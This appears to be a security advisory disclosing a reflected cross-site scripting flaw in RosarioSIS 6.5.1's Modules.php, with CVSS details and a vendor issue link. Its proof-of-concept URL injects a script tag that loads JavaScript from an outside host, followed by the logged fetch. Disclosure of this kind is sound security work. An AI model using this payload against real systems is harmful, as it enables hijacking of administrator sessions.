Reflected Cross-Site Scripting vulnerability
Cross-Site Scripting vulnerability in RosarioSIS Student Information System allows remote attackers to execute arbitrary web script. The exploitation of this issue can lead to admin session hijacking or executing arbitrary requests using the admin's session.
| Plugin | README |
|---|---|
| Vulnerability type: | Cross-Site Scripting vulnerability (XSS) |
| Vendor of the product(s): | RosarioSIS |
| Affected product(s)/code base: | Tested on version 6.5.1 |
| Has vendor confirmed or acknowledged the vulnerability: | Yes |
| Attack type: | Reflected XSS |
| Impact & Description: | C:L/I:L/A:N |
| Affected component: | Modules.php |
| Attack vector(s): | Remote |
| Proof of concept (PoC): | Details below |
| Reference(s): | https://github.com/francoisjacquet/rosariosis/issues/260 |
| CVSS v3.1 details: | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Notes:
# PoC
http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1# vuln.com gets this requests for xss.js
GET /xss.js HTTP/1.1
Host: RosarioSIS.edu
User-Agent: Mozilla/5.0 (Win)
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1